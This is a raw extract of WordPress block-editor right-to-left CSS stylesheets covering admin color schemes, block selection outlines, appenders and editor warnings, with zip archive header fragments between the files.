(min-resolution:192dpi){body.admin-color-ectoplasm{--wp-admin-border-width-focus:1.5px}}body.admin-color-midnight{--wp-admin-theme-color:#e14d43;--wp-admin-theme-color--rgb:225,77,67;--wp-admin-theme-color-darker-10:#dd382d;--wp-admin-theme-color-darker-10--rgb:221.4908256881,56.1788990826,45.0091743119;--wp-admin-theme-color-darker-20:#d02c21;--wp-admin-theme-color-darker-20--rgb:207.8348623853,44.2201834862,33.1651376147;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-midnight{--wp-admin-border-width-focus:1.5px}}body.admin-color-ocean{--wp-admin-theme-color:#627c83;--wp-admin-theme-color--rgb:98,124,131;--wp-admin-theme-color-darker-10:#576e74;--wp-admin-theme-color-darker-10--rgb:87.0873362445,110.192139738,116.4126637555;--wp-admin-theme-color-darker-20:#4c6066;--wp-admin-theme-color-darker-20--rgb:76.1746724891,96.384279476,101.8253275109;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ocean{--wp-admin-border-width-focus:1.5px}}body.admin-color-sunrise{--wp-admin-theme-color:#dd823b;--wp-admin-theme-color--rgb:221,130,59;--wp-admin-theme-color-darker-10:#d97426;--wp-admin-theme-color-darker-10--rgb:216.8782608696,116.1847826087,37.6217391304;--wp-admin-theme-color-darker-20:#c36922;--wp-admin-theme-color-darker-20--rgb:195.147826087,104.5434782609,33.852173913;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-sunrise{--wp-admin-border-width-focus:1.5px}}PK!\`SS!dist/block-editor/content-rtl.cssnuȯ:root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .block-editor-block-icon{ align-items:center; display:flex; height:24px; justify-content:center; width:24px; } .block-editor-block-icon.has-colors svg{ fill:currentColor; } @media (forced-colors:active){ .block-editor-block-icon.has-colors svg{ fill:CanvasText; } } .block-editor-block-icon svg{ max-height:24px; max-width:24px; min-height:20px; min-width:20px; } .block-editor-block-styles .block-editor-block-list__block{ margin:0; } @keyframes selection-overlay__fade-in-animation{ 0%{ opacity:0; } to{ opacity:.4; } } :root .block-editor-block-list__layout::selection,:root [data-has-multi-selection=true] .block-editor-block-list__layout::selection,_::-webkit-full-page-media,_:future{ background-color:initial; } .block-editor-block-list__layout{ position:relative; } .block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected:not(.is-partially-selected) ::selection,.block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected:not(.is-partially-selected)::selection{ background:#0000; } .block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected:not(.is-partially-selected):after{ background:var(--wp-admin-theme-color); bottom:0; content:""; left:0; opacity:.4; pointer-events:none; position:absolute; right:0; top:0; z-index:1; } @media not (prefers-reduced-motion){ .block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected:not(.is-partially-selected):after{ animation:selection-overlay__fade-in-animation .1s ease-out; animation-fill-mode:forwards; } } .block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected:not(.is-partially-selected):after{ outline:2px solid #0000; } .block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected:not(.is-partially-selected).is-highlighted:after{ outline-color:#0000; } .block-editor-block-list__layout .block-editor-block-list__block.is-highlighted,.block-editor-block-list__layout .block-editor-block-list__block.is-highlighted~.is-multi-selected,.block-editor-block-list__layout .block-editor-block-list__block:not([contenteditable=true]):focus{ outline:none; } .block-editor-block-list__layout .block-editor-block-list__block.is-highlighted:after,.block-editor-block-list__layout .block-editor-block-list__block.is-highlighted~.is-multi-selected:after,.block-editor-block-list__layout .block-editor-block-list__block:not([contenteditable=true]):focus:after{ bottom:0; content:""; left:0; outline-color:var(--wp-admin-theme-color); outline-offset:calc(var(--wp-admin-border-width-focus)*-1/var(--wp-block-editor-iframe-zoom-out-scale, 1)); outline-style:solid; outline-width:calc(var(--wp-admin-border-width-focus)*1/var(--wp-block-editor-iframe-zoom-out-scale, 1)); pointer-events:none; position:absolute; right:0; top:0; z-index:1; } .block-editor-block-list__layout .block-editor-block-list__block.is-block-hidden{ border:none !important; height:0; overflow:hidden; padding:0 !important; visibility:hidden; } .block-editor-block-list__layout.is-layout-flex:not(.is-vertical)>.is-block-hidden{ align-self:stretch; height:auto; white-space:nowrap !important; width:0; } .block-editor-block-list__layout [class^=components-]{ -webkit-user-select:text; user-select:text; } .block-editor-block-list__layout .block-editor-block-list__block{ overflow-wrap:break-word; pointer-events:auto; position:relative; } .block-editor-block-list__layout .block-editor-block-list__block.is-editing-disabled{ pointer-events:none; } .block-editor-block-list__layout .block-editor-block-list__block.has-negative-margin.has-child-selected,.block-editor-block-list__layout .block-editor-block-list__block.has-negative-margin.is-selected{ z-index:20; } .block-editor-block-list__layout .block-editor-block-list__block .reusable-block-edit-panel *{ z-index:1; } .block-editor-block-list__layout .block-editor-block-list__block .components-placeholder .components-with-notices-ui{ margin:-10px 0 12px; } .block-editor-block-list__layout .block-editor-block-list__block .components-with-notices-ui{ margin:0 0 12px; width:100%; } .block-editor-block-list__layout .block-editor-block-list__block .components-with-notices-ui .components-notice .components-notice__content{ font-size:13px; } .block-editor-block-list__layout .block-editor-block-list__block.has-warning{ min-height:48px; } .block-editor-block-list__layout .block-editor-block-list__block.has-warning>*{ pointer-events:none; -webkit-user-select:none; user-select:none; } .block-editor-block-list__layout .block-editor-block-list__block.has-warning .block-editor-warning{ pointer-events:all; } .block-editor-block-list__layout .block-editor-block-list__block.has-warning:after{ background-color:#fff6; bottom:0; content:""; left:0; position:absolute; right:0; top:0; } .block-editor-block-list__layout .block-editor-block-list__block.has-warning.is-multi-selected:after{ background-color:initial; } .block-editor-block-list__layout .block-editor-block-list__block.is-reusable.has-child-selected:after{ box-shadow:0 0 0 1px var(--wp-admin-theme-color); } .block-editor-block-list__layout .block-editor-block-list__block[data-clear=true]{ float:none; } .block-editor-block-list__layout .block-editor-block-list__block:not([data-draggable=true]),.block-editor-block-list__layout .block-editor-block-list__block:not([draggable=true]){ cursor:default; } .block-editor-block-list__layout .block-editor-block-list__block[data-draggable=true],.block-editor-block-list__layout .block-editor-block-list__block[draggable=true]{ cursor:grab; } .block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected{ cursor:default; } .block-editor-block-list__layout .block-editor-block-list__block [contenteditable],.block-editor-block-list__layout .block-editor-block-list__block[contenteditable]{ cursor:text; } .is-outline-mode .block-editor-block-list__block:not(.remove-outline).is-hovered:not(.is-selected):after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline):not(.rich-text):not([contenteditable=true]).is-selected:after{ bottom:0; content:""; left:0; outline-color:var(--wp-admin-theme-color); outline-offset:calc(var(--wp-admin-border-width-focus)*-1/var(--wp-block-editor-iframe-zoom-out-scale, 1)); outline-style:solid; outline-width:calc(var(--wp-admin-border-width-focus)*1/var(--wp-block-editor-iframe-zoom-out-scale, 1)); pointer-events:none; position:absolute; right:0; top:0; } .is-outline-mode .block-editor-block-list__block:not(.remove-outline).is-reusable.block-editor-block-list__block:not([contenteditable]):focus:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).is-reusable.is-highlighted:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).is-reusable.is-hovered:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).is-reusable.is-selected:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.block-editor-block-list__block:not([contenteditable]):focus:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-highlighted:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-hovered:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-selected:after{ outline-color:var(--wp-block-synced-color); } @keyframes block-editor-is-editable__animation{ 0%{ background-color:rgba(var(--wp-admin-theme-color--rgb), .1); } to{ background-color:rgba(var(--wp-admin-theme-color--rgb), 0); } } @keyframes block-editor-is-editable__animation_reduce-motion{ 0%{ background-color:rgba(var(--wp-admin-theme-color--rgb), .1); } 99%{ background-color:rgba(var(--wp-admin-theme-color--rgb), .1); } to{ background-color:rgba(var(--wp-admin-theme-color--rgb), 0); } } .is-root-container:not([inert]) .block-editor-block-list__block.is-selected .block-editor-block-list__block.has-editable-outline:after{ animation-delay:.1s; animation-duration:.8s; animation-fill-mode:backwards; animation-name:block-editor-is-editable__animation; animation-timing-function:ease-out; bottom:0; content:""; left:0; pointer-events:none; position:absolute; right:0; top:0; } @media (prefers-reduced-motion:reduce){ .is-root-container:not([inert]) .block-editor-block-list__block.is-selected .block-editor-block-list__block.has-editable-outline:after{ animation-delay:0s; animation-name:block-editor-is-editable__animation_reduce-motion; } } .is-focus-mode .block-editor-block-list__block:not(.has-child-selected){ opacity:.2; } @media not (prefers-reduced-motion){ .is-focus-mode .block-editor-block-list__block:not(.has-child-selected){ transition:opacity .1s linear; } } .is-focus-mode .block-editor-block-list__block.is-content-locked-temporarily-editing-as-blocks.has-child-selected,.is-focus-mode .block-editor-block-list__block.is-content-locked-temporarily-editing-as-blocks.has-child-selected .block-editor-block-list__block,.is-focus-mode .block-editor-block-list__block.is-content-locked.has-child-selected,.is-focus-mode .block-editor-block-list__block.is-content-locked.has-child-selected .block-editor-block-list__block,.is-focus-mode .block-editor-block-list__block:not(.has-child-selected) .block-editor-block-list__block,.is-focus-mode .block-editor-block-list__block:not(.has-child-selected).is-multi-selected,.is-focus-mode .block-editor-block-list__block:not(.has-child-selected).is-selected{ opacity:1; } .wp-block.alignleft,.wp-block.alignright,.wp-block[data-align=left]>*,.wp-block[data-align=right]>*{ z-index:21; } .wp-site-blocks>[data-align=left]{ float:right; margin-left:2em; } .wp-site-blocks>[data-align=right]{ float:left; margin-right:2em; } .wp-site-blocks>[data-align=center]{ justify-content:center; margin-left:auto; margin-right:auto; } .block-editor-block-list .block-editor-inserter{ cursor:move; cursor:grab; margin:8px; } @keyframes block-editor-inserter__toggle__fade-in-animation{ 0%{ opacity:0; } to{ opacity:1; } } @media not (prefers-reduced-motion){ .wp-block .block-list-appender .block-editor-inserter__toggle{ animation:block-editor-inserter__toggle__fade-in-animation .1s ease; animation-fill-mode:forwards; } } .block-editor-block-list__block:not(.is-selected):not(.has-child-selected) .block-editor-default-block-appender{ display:none; } .block-editor-block-list__block:not(.is-selected):not(.has-child-selected) .block-editor-default-block-appender .block-editor-inserter__toggle{ opacity:0; transform:scale(0); } .block-editor-block-list__block .block-editor-block-list__block-html-textarea{ border:none; border-radius:2px; box-shadow:inset 0 0 0 1px #1e1e1e; box-sizing:border-box; display:block; font-family:Menlo,Consolas,monaco,monospace; font-size:15px; line-height:1.5; margin:0; outline:none; overflow:hidden; padding:12px; resize:none; width:100%; } @media not (prefers-reduced-motion){ .block-editor-block-list__block .block-editor-block-list__block-html-textarea{ transition:padding .2s linear; } } .block-editor-block-list__block .block-editor-block-list__block-html-textarea:focus{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .block-editor-block-list__block .block-editor-warning{ position:relative; z-index:5; } .block-editor-block-list__block .block-editor-warning.block-editor-block-list__block-crash-warning{ margin-bottom:auto; } .block-editor-block-list__zoom-out-separator{ background:#ddd; margin-left:-1px; margin-right:-1px; } @media not (prefers-reduced-motion){ .block-editor-block-list__zoom-out-separator{ transition:background-color .3s ease; } } .block-editor-block-list__zoom-out-separator{ align-items:center; color:#000; display:flex; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:400; justify-content:center; overflow:hidden; } .is-zoomed-out .block-editor-block-list__zoom-out-separator{ font-size:calc(13px/var(--wp-block-editor-iframe-zoom-out-scale)); } .block-editor-block-list__zoom-out-separator.is-dragged-over{ background:#ccc; } .block-editor-block-list__layout.is-root-container.has-global-padding>.block-editor-block-list__zoom-out-separator,.has-global-padding>.block-editor-block-list__zoom-out-separator{ margin:0 calc(var(--wp--style--root--padding-left)*-1 - 1px) 0 calc(var(--wp--style--root--padding-right)*-1 - 1px) !important; max-width:none; } .is-dragging{ cursor:grabbing; } .is-vertical .block-list-appender{ margin-left:auto; margin-right:12px; margin-top:12px; width:24px; } .block-list-appender>.block-editor-inserter{ display:block; } .block-editor-block-list__block:not(.is-selected):not(.has-child-selected):not(.block-editor-block-list__layout) .block-editor-block-list__layout>.block-list-appender .block-list-appender__toggle{ opacity:0; transform:scale(0); } .block-editor-block-list__block.has-block-overlay{ cursor:default; } .block-editor-block-list__block.has-block-overlay .block-editor-block-list__block{ pointer-events:none; } .block-editor-block-list__block.has-block-overlay .block-editor-block-list__block.has-block-overlay:before{ left:0; right:0; width:auto; } .block-editor-block-list__layout .is-dragging{ opacity:.1; } .block-editor-block-list__layout .is-dragging iframe{ pointer-events:none; } .block-editor-block-list__layout .is-dragging::selection{ background:#0000 !important; } .block-editor-block-list__layout .is-dragging:after{ content:none !important; } .wp-block img:not([draggable]),.wp-block svg:not([draggable]){ pointer-events:none; } .block-editor-block-preview__content-iframe .block-list-appender{ display:none; } .block-editor-block-preview__live-content *{ pointer-events:none; } .block-editor-block-preview__live-content .block-list-appender{ display:none; } .block-editor-block-preview__live-content .components-button:disabled{ opacity:1; } .block-editor-block-preview__live-content .block-editor-block-list__block[data-empty=true],.block-editor-block-preview__live-content .components-placeholder{ display:none; } .block-editor-block-variation-picker__skip,.block-editor-block-variation-picker__variations,.wp-block-group-placeholder__variations{ display:flex; flex-direction:row; flex-wrap:wrap; font-size:12px; gap:8px; justify-content:flex-start; list-style:none; margin:0; padding:0; width:100%; } .block-editor-block-variation-picker__skip svg,.block-editor-block-variation-picker__variations svg,.wp-block-group-placeholder__variations svg{ fill:#949494 !important; } .block-editor-block-variation-picker__skip .components-button,.block-editor-block-variation-picker__variations .components-button,.wp-block-group-placeholder__variations .components-button{ padding:4px; } .block-editor-block-variation-picker__skip .components-button:hover,.block-editor-block-variation-picker__variations .components-button:hover,.wp-block-group-placeholder__variations .components-button:hover{ background:none !important; } .block-editor-block-variation-picker__skip .components-button:hover svg,.block-editor-block-variation-picker__variations .components-button:hover svg,.wp-block-group-placeholder__variations .components-button:hover svg{ fill:var(--wp-admin-theme-color) !important; } .block-editor-block-variation-picker__skip>li,.block-editor-block-variation-picker__variations>li,.wp-block-group-placeholder__variations>li{ align-items:center; display:flex; flex-direction:column; gap:4px; width:auto; } .block-editor-button-block-appender{ align-items:center; box-shadow:inset 0 0 0 1px #1e1e1e; color:#1e1e1e; display:flex; flex-direction:column; height:auto; justify-content:center; width:100%; } .is-dark-theme .block-editor-button-block-appender{ box-shadow:inset 0 0 0 1px #ffffffa6; color:#ffffffa6; } .block-editor-button-block-appender:hover{ box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color); color:var(--wp-admin-theme-color); } .block-editor-button-block-appender:focus{ box-shadow:inset 0 0 0 2px var(--wp-admin-theme-color); } .block-editor-button-block-appender:active{ color:#000; } .block-editor-block-list__block:not(.is-selected)>.is-layout-constrained.wp-block-group__inner-container>.block-list-appender:only-child,.block-editor-block-list__block:not(.is-selected)>.is-layout-flow.wp-block-group__inner-container>.block-list-appender:only-child,.is-layout-constrained.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child,.is-layout-flow.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child{ pointer-events:none; } .block-editor-block-list__block:not(.is-selected)>.is-layout-constrained.wp-block-group__inner-container>.block-list-appender:only-child:after,.block-editor-block-list__block:not(.is-selected)>.is-layout-flow.wp-block-group__inner-container>.block-list-appender:only-child:after,.is-layout-constrained.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child:after,.is-layout-flow.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child:after{ border:1px dashed; bottom:0; content:""; left:0; pointer-events:none; position:absolute; right:0; top:0; } .block-editor-block-list__block:not(.is-selected)>.is-layout-constrained.wp-block-group__inner-container>.block-list-appender:only-child .block-editor-inserter,.block-editor-block-list__block:not(.is-selected)>.is-layout-flow.wp-block-group__inner-container>.block-list-appender:only-child .block-editor-inserter,.is-layout-constrained.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child .block-editor-inserter,.is-layout-flow.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child .block-editor-inserter{ opacity:0; } .block-editor-block-list__block:not(.is-selected)>.is-layout-constrained.wp-block-group__inner-container>.block-list-appender:only-child .block-editor-inserter:focus-within,.block-editor-block-list__block:not(.is-selected)>.is-layout-flow.wp-block-group__inner-container>.block-list-appender:only-child .block-editor-inserter:focus-within,.is-layout-constrained.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child .block-editor-inserter:focus-within,.is-layout-flow.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child .block-editor-inserter:focus-within{ opacity:1; } .block-editor-block-list__block:not(.is-selected)>.is-layout-constrained.wp-block-group__inner-container>.block-list-appender:only-child.is-drag-over:after,.block-editor-block-list__block:not(.is-selected)>.is-layout-flow.wp-block-group__inner-container>.block-list-appender:only-child.is-drag-over:after,.is-layout-constrained.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child.is-drag-over:after,.is-layout-flow.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child.is-drag-over:after{ border:none; } .block-editor-block-list__block:not(.is-selected)>.is-layout-constrained.wp-block-group__inner-container>.block-list-appender:only-child.is-drag-over .block-editor-inserter,.block-editor-block-list__block:not(.is-selected)>.is-layout-flow.wp-block-group__inner-container>.block-list-appender:only-child.is-drag-over .block-editor-inserter,.is-layout-constrained.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child.is-drag-over .block-editor-inserter,.is-layout-flow.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child.is-drag-over .block-editor-inserter{ visibility:visible; } .block-editor-block-list__block:not(.is-selected)>.block-editor-block-list__block>.block-list-appender:only-child:after{ border:none; } .block-list-appender:only-child.is-drag-over .block-editor-button-block-appender{ background-color:var(--wp-admin-theme-color); box-shadow:inset 0 0 0 1px #ffffffa6; color:#ffffffa6; } @media not (prefers-reduced-motion){ .block-list-appender:only-child.is-drag-over .block-editor-button-block-appender{ transition:background-color .2s ease-in-out; } } .block-editor-default-block-appender{ clear:both; margin-left:auto; margin-right:auto; position:relative; } .block-editor-default-block-appender[data-root-client-id=""] .block-editor-default-block-appender__content:hover{ outline:1px solid #0000; } .block-editor-default-block-appender .block-editor-default-block-appender__content{ margin-block-end:0; margin-block-start:0; opacity:.62; } .block-editor-default-block-appender .components-drop-zone__content-icon{ display:none; } .block-editor-default-block-appender .block-editor-inserter__toggle.components-button.has-icon{ background:#1e1e1e; color:#fff; height:24px; min-width:24px; padding:0; } .block-editor-default-block-appender .block-editor-inserter__toggle.components-button.has-icon:hover{ background:var(--wp-admin-theme-color); color:#fff; } .block-editor-default-block-appender .block-editor-inserter{ left:0; line-height:0; position:absolute; top:0; } .block-editor-default-block-appender .block-editor-inserter:disabled{ display:none; } .block-editor-block-list__block .block-list-appender{ bottom:0; left:0; list-style:none; padding:0; position:absolute; z-index:2; } .block-editor-block-list__block .block-list-appender.block-list-appender{ line-height:0; margin:0; } .block-editor-block-list__block .block-list-appender .block-editor-inserter:disabled{ display:none; } .block-editor-block-list__block .block-list-appender .block-editor-default-block-appender{ height:24px; } .block-editor-block-list__block .block-list-appender .block-editor-inserter__toggle.components-button.has-icon,.block-editor-block-list__block .block-list-appender .block-list-appender__toggle{ background:#1e1e1e; box-shadow:none; color:#fff; display:none; flex-direction:row; height:24px; min-width:24px; padding:0 !important; width:24px; } .block-editor-block-list__block .block-list-appender .block-editor-inserter__toggle.components-button.has-icon:hover,.block-editor-block-list__block .block-list-appender .block-list-appender__toggle:hover{ background:var(--wp-admin-theme-color); color:#fff; } .block-editor-block-list__block .block-list-appender .block-editor-default-block-appender__content{ display:none; } .block-editor-block-list__block .block-list-appender:only-child{ align-self:center; left:auto; line-height:inherit; list-style:none; position:relative; } .block-editor-block-list__block .block-list-appender:only-child .block-editor-default-block-appender__content{ display:block; } .block-editor-block-list__block.is-selected .block-editor-block-list__layout>.block-list-appender .block-editor-inserter__toggle.components-button.has-icon,.block-editor-block-list__block.is-selected .block-editor-block-list__layout>.block-list-appender .block-list-appender__toggle,.block-editor-block-list__block.is-selected>.block-list-appender .block-editor-inserter__toggle.components-button.has-icon,.block-editor-block-list__block.is-selected>.block-list-appender .block-list-appender__toggle{ display:flex; } .block-editor-default-block-appender__content{ cursor:text; } .block-editor-iframe__body{ position:relative; } .block-editor-iframe__html{ transform-origin:top center; } @media not (prefers-reduced-motion){ .block-editor-iframe__html{ transition:background-color .4s; } } .block-editor-iframe__html.zoom-out-animation{ bottom:0; left:0; overflow-y:var(--wp-block-editor-iframe-zoom-out-overflow-behavior, scroll); position:fixed; right:0; top:calc(var(--wp-block-editor-iframe-zoom-out-scroll-top, 0)*-1); } .block-editor-iframe__html.is-zoomed-out{ background-color:var(--wp-editor-canvas-background); margin-bottom:calc(var(--wp-block-editor-iframe-zoom-out-content-height)*(1 - var(--wp-block-editor-iframe-zoom-out-scale, 1))*-1 + var(--wp-block-editor-iframe-zoom-out-frame-size, 0)*2/var(--wp-block-editor-iframe-zoom-out-scale, 1)*-1 + -2px); padding-bottom:calc(var(--wp-block-editor-iframe-zoom-out-frame-size, 0)/var(--wp-block-editor-iframe-zoom-out-scale, 1)); padding-top:calc(var(--wp-block-editor-iframe-zoom-out-frame-size, 0)/var(--wp-block-editor-iframe-zoom-out-scale, 1)); scale:var(--wp-block-editor-iframe-zoom-out-scale, 1); transform:translateX(calc(((var(--wp-block-editor-iframe-zoom-out-scale-container-width) - var(--wp-block-editor-iframe-zoom-out-container-width, 100vw))/2/var(--wp-block-editor-iframe-zoom-out-scale, 1))*-1)); } .block-editor-iframe__html.is-zoomed-out body{ min-height:calc((var(--wp-block-editor-iframe-zoom-out-inner-height) - 2*var(--wp-block-editor-iframe-zoom-out-frame-size, 0)/var(--wp-block-editor-iframe-zoom-out-scale, 1))/var(--wp-block-editor-iframe-zoom-out-scale, 1)); } .block-editor-iframe__html.is-zoomed-out body>.is-root-container:not(.wp-block-post-content){ display:flex; flex:1; flex-direction:column; height:100%; } .block-editor-iframe__html.is-zoomed-out body>.is-root-container:not(.wp-block-post-content)>main{ flex:1; } .block-editor-iframe__html.is-zoomed-out .wp-block[draggable]{ cursor:grab; } .block-editor-media-placeholder__cancel-button.is-link{ display:block; margin:1em; } .block-editor-media-placeholder.is-appender{ min-height:0; } .block-editor-media-placeholder.is-appender:hover{ box-shadow:0 0 0 1px var(--wp-admin-theme-color); cursor:pointer; } .block-editor-plain-text{ border:none; box-shadow:none; color:inherit; font-family:inherit; font-size:inherit; line-height:inherit; margin:0; padding:0; width:100%; } .rich-text [data-rich-text-placeholder]{ pointer-events:none; } .rich-text [data-rich-text-placeholder]:after{ content:attr(data-rich-text-placeholder); opacity:.62; } .rich-text:focus{ outline:none; } figcaption.block-editor-rich-text__editable [data-rich-text-placeholder]:before{ opacity:.8; } [data-rich-text-script]{ display:inline; } [data-rich-text-script]:before{ background:#ff0; content:""; } [data-rich-text-comment],[data-rich-text-format-boundary]{ border-radius:2px; } [data-rich-text-comment]{ background-color:currentColor; } [data-rich-text-comment] span{ color:currentColor; filter:invert(100%); padding:0 2px; } .rich-text [contenteditable=false]::selection{ background-color:initial; } .block-editor-warning{ align-items:center; background-color:#fff; border:1px solid #1e1e1e; border-radius:2px; display:flex; flex-wrap:wrap; padding:1em; } .block-editor-warning,.block-editor-warning .block-editor-warning__message{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; } .block-editor-warning .block-editor-warning__message{ color:#1e1e1e; font-size:13px; line-height:1.4; margin:0; } .block-editor-warning p.block-editor-warning__message.block-editor-warning__message{ min-height:auto; } .block-editor-warning .block-editor-warning__contents{ align-items:baseline; display:flex; flex-direction:row; flex-wrap:wrap; gap:12px; justify-content:space-between; width:100%; } .block-editor-warning .block-editor-warning__actions{ align-items:center; display:flex; gap:8px; } .components-popover.block-editor-warning__dropdown{ z-index:99998; } body.admin-color-light{ --wp-admin-theme-color:#0085ba; --wp-admin-theme-color--rgb:0, 133, 186; --wp-admin-theme-color-darker-10:#0073a1; --wp-admin-theme-color-darker-10--rgb:0, 114.7661290323, 160.5; --wp-admin-theme-color-darker-20:#006187; --wp-admin-theme-color-darker-20--rgb:0, 96.5322580645, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-light{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-modern{ --wp-admin-theme-color:#3858e9; --wp-admin-theme-color--rgb:56, 88, 233; --wp-admin-theme-color-darker-10:#2145e6; --wp-admin-theme-color-darker-10--rgb:33.0384615385, 68.7307692308, 230.4615384615; --wp-admin-theme-color-darker-20:#183ad6; --wp-admin-theme-color-darker-20--rgb:23.6923076923, 58.1538461538, 214.3076923077; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-modern{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-blue{ --wp-admin-theme-color:#096484; --wp-admin-theme-color--rgb:9, 100, 132; --wp-admin-theme-color-darker-10:#07526c; --wp-admin-theme-color-darker-10--rgb:7.3723404255, 81.914893617, 108.1276595745; --wp-admin-theme-color-darker-20:#064054; --wp-admin-theme-color-darker-20--rgb:5.7446808511, 63.829787234, 84.2553191489; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-blue{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-coffee{ --wp-admin-theme-color:#46403c; --wp-admin-theme-color--rgb:70, 64, 60; --wp-admin-theme-color-darker-10:#383330; --wp-admin-theme-color-darker-10--rgb:56.2692307692, 51.4461538462, 48.2307692308; --wp-admin-theme-color-darker-20:#2b2724; --wp-admin-theme-color-darker-20--rgb:42.5384615385, 38.8923076923, 36.4615384615; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-coffee{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ectoplasm{ --wp-admin-theme-color:#523f6d; --wp-admin-theme-color--rgb:82, 63, 109; --wp-admin-theme-color-darker-10:#46365d; --wp-admin-theme-color-darker-10--rgb:69.8430232558, 53.6598837209, 92.8401162791; --wp-admin-theme-color-darker-20:#3a2c4d; --wp-admin-theme-color-darker-20--rgb:57.6860465116, 44.3197674419, 76.6802325581; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ectoplasm{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-midnight{ --wp-admin-theme-color:#e14d43; --wp-admin-theme-color--rgb:225, 77, 67; --wp-admin-theme-color-darker-10:#dd382d; --wp-admin-theme-color-darker-10--rgb:221.4908256881, 56.1788990826, 45.0091743119; --wp-admin-theme-color-darker-20:#d02c21; --wp-admin-theme-color-darker-20--rgb:207.8348623853, 44.2201834862, 33.1651376147; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-midnight{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ocean{ --wp-admin-theme-color:#627c83; --wp-admin-theme-color--rgb:98, 124, 131; --wp-admin-theme-color-darker-10:#576e74; --wp-admin-theme-color-darker-10--rgb:87.0873362445, 110.192139738, 116.4126637555; --wp-admin-theme-color-darker-20:#4c6066; --wp-admin-theme-color-darker-20--rgb:76.1746724891, 96.384279476, 101.8253275109; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ocean{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-sunrise{ --wp-admin-theme-color:#dd823b; --wp-admin-theme-color--rgb:221, 130, 59; --wp-admin-theme-color-darker-10:#d97426; --wp-admin-theme-color-darker-10--rgb:216.8782608696, 116.1847826087, 37.6217391304; --wp-admin-theme-color-darker-20:#c36922; --wp-admin-theme-color-darker-20--rgb:195.147826087, 104.5434782609, 33.852173913; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-sunrise{ --wp-admin-border-width-focus:1.5px; } }PK!gE]dist/block-editor/style-rtl.cssnuȯ:root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .block-editor-autocompleters__block{ white-space:nowrap; } .block-editor-autocompleters__block .block-editor-block-icon{ margin-left:8px; } .block-editor-autocompleters__block[aria-selected=true] .block-editor-block-icon{ color:inherit !important; } .block-editor-autocompleters__link{ white-space:nowrap; } .block-editor-autocompleters__link .block-editor-block-icon{ margin-left:8px; } .block-editor-global-styles-background-panel__inspector-media-replace-container{ border:1px solid #ddd; border-radius:2px; grid-column:1 / -1; position:relative; } 